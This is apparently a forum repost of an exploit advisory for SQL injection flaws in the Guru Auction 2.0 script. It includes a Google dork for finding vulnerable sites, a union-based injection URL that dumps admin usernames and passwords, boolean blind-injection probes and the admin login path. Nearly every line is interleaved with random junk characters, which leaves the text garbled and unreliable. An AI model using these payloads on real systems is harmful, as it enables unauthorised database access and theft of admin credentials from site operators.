Guru Auction 2.0 Multiple SQL Injection Vulnerabilities2 f0 n$ b- A7 D8 l3 ]9 x
1 u2 }" G2 H' G. @2 `# M
作者 : v3n0m, U0 B( x) u+ @; C. K" w: S3 M
应用 : Guru Auction 2.0
9 g t- e. P1 y9 ePrice : $49
* r; ~: \4 T% C" vVendor : http://www.guruscript.com/
) q k8 t' g* G) r: PGoogle Dork : inurl:subcat.php?cate_id=: L1 q6 f/ Q. i* R: \
, ?1 @, u; B4 A. ~/ h3 E9 N
SQLi p0c:
% l3 T, D4 @' a) m: M~~~~~~~~~~
# Z' T& e% l3 }9 K5 w; c2 B* R+ [+ yhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
8 s( z g4 G- U0 o
" i7 [: ]. n; I3 v
# ~" r6 A% ?+ |4 A盲注 p0c:
# h. E0 e! X- u, m) B: J* x~~~~~~~~~~5 D* m/ I# V; d+ A+ `& e) W( t# {
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true( \4 ?) e* D1 x7 X) o
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false# z- m6 c* g+ X' N3 S; s1 K' n) f: c* r3 k
$ u9 A% B1 x' G+ D管理登录入口:
! w- {- g* A1 {! y' u~~~~~~~~~~
3 {1 {1 k9 M# |1 T c1 d6 ghttp://domain.tld/[path]/admin/
/ r& H# o0 i1 }* }2 D |
发表于 2012-12-31 09:24:05
收藏
分享
支持
反对